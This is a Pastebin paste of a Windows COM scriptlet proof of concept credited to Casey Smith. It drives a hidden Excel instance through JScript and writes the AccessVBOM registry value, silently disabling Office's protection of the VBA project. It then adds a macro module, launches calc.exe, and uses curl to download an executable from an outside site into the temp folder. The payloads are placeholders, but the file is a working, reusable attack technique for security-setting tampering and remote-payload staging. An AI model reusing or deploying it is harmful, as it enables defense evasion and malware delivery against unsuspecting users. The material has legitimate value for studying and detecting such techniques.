Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?XML version="1.0"?>
- <scriptlet>
- <registration
- progid="CalcShellcode"
- classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
- <!-- Proof Of Concept - Casey Smith @subTee -->
- <!-- Orginal Shellcode Example : https://www.scriptjunkie.us/2012/01/direct-shellcode-execution-in-ms-office-macros/ -->
- <script language="JScript">
- <![CDATA[
- var objExcel = new ActiveXObject("Excel.Application");
- objExcel.Visible = false;
- var WshShell = new ActiveXObject("WScript.Shell");
- var Application_Version = objExcel.Version;//Auto-Detect Version
- var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM";
- WshShell.RegWrite(strRegPath, 1, "REG_DWORD");
- var objWorkbook = objExcel.Workbooks.Add();
- var xlmodule = objWorkbook.VBProject.VBComponents.Add(1);
- WshShell.Run("calc.exe");
- var oShell = new ActiveXObject("WScript.Shell");
- oShell.Run("curl -o %temp%\\1999.exe https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe");
- objExcel.DisplayAlerts = false;
- objWorkbook.Close(false);
- ]]>
- </script>
- </registration>
- </scriptlet>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement